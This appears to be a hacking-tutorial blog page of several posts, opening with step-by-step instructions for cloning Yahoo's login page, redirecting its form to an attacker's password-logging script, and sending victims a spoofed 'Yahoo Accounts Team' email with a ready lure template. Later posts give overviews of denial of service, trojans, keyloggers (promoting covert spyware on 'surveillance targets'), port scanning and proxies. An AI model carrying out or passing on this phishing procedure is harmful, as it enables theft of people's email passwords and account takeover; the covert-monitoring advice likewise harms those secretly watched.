How to Create a Fake Login Page?

In this post I’ll show you how to create a Fake Login Page in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.

 

Here is a step-by-step procedure to create a fake login page.

1. Go to the Yahoo login page by typing the following URL.

mail.yahoo.com

 2. Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)

3. Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .

4. Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML

5. Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.

For example you may find something like this in the opened HTML file

src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif“

Rename the above link into

 

src=”files/ma_mail_1.gif“

Repeat the same procedure for every file contained in the Folder.

 

6. Now search for the following term

 

action=

 

you will see something like this

 

action=https://login.yahoo.com/config/login?

Edit this to

 

action=http://yoursite.com/login.php

Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

yoursite.com/

7. Now you have to upload your yahoo.HTML, files folder and login.php to

 

NOTE: Make sure that your host supports PHP

8. Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)

9. Once you do this distribute the Gmail.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file in your site.Download .TXT file to see the password inside

The details of hacking an email, using a Fake login page is discussed in detail in my new post  Hack Yahoo, Gmail or any other Password

Read More

Hack Yahoo, Gmail or any Email Password

Today I will show you how to Hack Yahoo, Gmail or any other email Password.I have already shown some of the easiest ways to Hack Yahoo in my previous post Hacking an email account.So, you may wonder what’s special about this post.Here in this post I will show all of you the real way to Hack Yahoo and other passwords.This method to hack passwords is same as the one used by many professional hackers.

NOTE:THIS TUTORIAL IS MEANT FOR EDUCATIONAL PURPOSE ONLY.I AM NOT RESPONSIBLE FOR ANY KIND OF MISUSE. 

 

STEPS TO BE CARRIED OUT BEFORE YOU HACK YAHOO 

Let’s see how to hack Yahoo in particular.Before we hack the password, we have to understand how to exploit the major vulnerabilities in Yahoo.During the sign up process, it allows your First name or the Last name to contain the Word Yahoo .Is this not a major flaw? Yes, because you can choose the first name as Yahoo Account and last name as Update.So, when you send an email from this Yahoo account, it appears to have come from

Yahoo Account Update (Yahoo Accounts Team)

So, this helps us to make the victims believe that this is an email from Yahoo Accounts Team.

So What’s Next?

CREATING A NEW ACCOUNT

Before you hack Yahoo, you need to create a new account as given below

1. Choose the first name as YAHOO ACCOUNT and last name as UPDATE.

2. Select an email ID something like this

update_account@yahoo.com

update08_account@yahoo.com

accountupdate09@yahoo.com  etc.

I think you got the idea.

3. Always select @yahoo.com not yahoo.co.uk or yahoo.co.in.

Now you are all set to hack the password.

USING A FAKE LOGIN PAGE TO HACK YAHOO

We have to hack yahoo using a fake login page.Hacking Yahoo using a Fake login page has more success rate than any other method.In fact, this is the real procedure adopted by many hackers to hack an email password.

The step-by-step procedure to create a fake login page is explained in my post How to create a fake login page

After you have setup your new Yahoo account and the fake login page, it’s just  a cakewalk to hack the password.All you have to do is just send an email from your fake Yahoo account to the victim’s ID saying that

————————————————————————————

Dear <Victim Name> or Yahoo subscriber,

It is highly recommended that you update your account immediately as per the new policy adopted by Yahoo.Blah blah…

Click Here to update your account.

Thanks,

The Yahoo accounts team

————————————————————————————

Remember to link your Fake login page to the text Click Here.Once the victim enters the password in the fake login page, you have successfully hacked the Yahoo password.The above procedure can also be used to hack Gmail and other email passwords.

You can see the DEMO of fake login page that I have created HERE.

Please pass your comments and opinions.

Read More

Denial Of Service Attack

Its Real,On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.

What is a Denial Of Service Attack?

 

• A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.


• If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack.

Types of denial of service attacks

There are several general categories of DoS attacks.Popularly, the attacks are divided into three classes:

• bandwidth attacks,


• protocol attacks, and


• logic attacks
  
  

What is Distributed Denial of Service Attack?

• An attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time.


• This makes it difficult to detect because attacks originate from several IP addresses.


• If a single IP address is attacking a company, it can block that address at its firewall. If it is 30000 this is extremely difficult.

Read More

Trojans and Backdoors

A Trojan horse is an unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.

• It is a legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.


• Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.

Working of Trojans

 

• Attacker gets access to the trojaned system as the system goes online


• By way of the access provided by the trojan attacker can stage attacks of different types.

Various Trojan Types

• Remote Access Trojans


• Password Sending Trojans


• Keyloggers


• Destructive


• Denial Of Service (DoS) Attack Trojans


• Proxy/Wingate Trojans


• FTP Trojans


• Software Detection Killers

Modes of Transmission

• Attachments


• Physical Access


• Browser And E-mail Software Bugs


• NetBIOS (File Sharing)


• Fake Programs


• Un-trusted Sites And Freeware Software

Backdoor Countermeasures

• Most commercial ant-virus products can automatically scan and detect backdoor programs before they can cause damage (Eg. before accessing a floppy, running exe or downloading mail)


• An inexpensive tool called Cleaner (http://www.moosoft.com/cleanet.html) can identify and eradicate 1000 types of backdoor programs and trojans.


• Educate your users not to install applications downloaded from the internet and e-mail attachments.

Read More

Keyloggers (Keystroke Loggers)

Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.

There are two types of keystroke loggers:

1. Software based and

2. Hardware based.

Spy ware: Spector (http://www.spector.com/)

• Spector is a spy ware and it will record everything anyone does on the internet.


• Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.


• Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer’s hard drive.

Hacking Tool: eBlaster (http://www.spector.com/)

eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.

Within seconds of them sending or receiving an email, you will receive your own copy of that email.

Hacking Tool: (Hardware Keylogger) (http://www.keyghost.com)

 

eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.

Within seconds of them sending or receiving an email, you will receive your own copy of that email.

Hacking Tool: (Hardware Keylogger) (http://www.keyghost.com)

<

The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.

Read More

Port Scanning

Port Scanning is one of the most popular techniques used by hackers to discover services that can be compromised.

• A potential target computer runs many ’services’ that listen at ‘well-known’ ‘ports’.


• By scanning which ports are available on the victim, the hacker finds potential vulnerabilities that can be exploited.


• Scan techniques can be differentiated broadly into Vanilla, Strobe, Stealth, FTP Bounce, Fragmented Packets, Sweep and UDP Scans.

Port Scanning Techniques

Port Scanning Techniques can be broadly classified into:

• Open scan


• Half- open scan


• Stealth scan


• Sweeps


• Misc

Commonly used tools for port scanning

1.Tool: SuperScan 3.0

 

 

 

 

 

 

 

 

2. Tool: NMap (Network Mapper)

3. Tool: NetScan Tools Pro 2003

4. Tool: ipEye, IPSecScan

Read More

Proxy Servers and Anonymizers

Proxy is a network computer that can serve as an intermediate for connection with other computers. They are usually used for the following purposes:

 

• As firewall, a proxy protects the local network from outside access.


• As IP-addresses multiplexer, a proxy allows to connect a number of computers to Internet when having only one IP-address.


• Proxy servers can be used (to some extent) to anonymize web surfing.


• Specialized proxy servers can filter out unwanted content, such as ads or ‘unsuitable’ material.


• Proxy servers can afford some protection against hacking attacks.

Anonymizers

• Anonymizers are services that help make your own web surfing anonymous.


• The first anonymizer developed was Anonymizer.com, created in 1997 by Lance Cottrell.


• An anonymizer removes all the identifying information from a user’s computers while the user surfs the Internet, thereby ensuring the privacy of the user.

Read More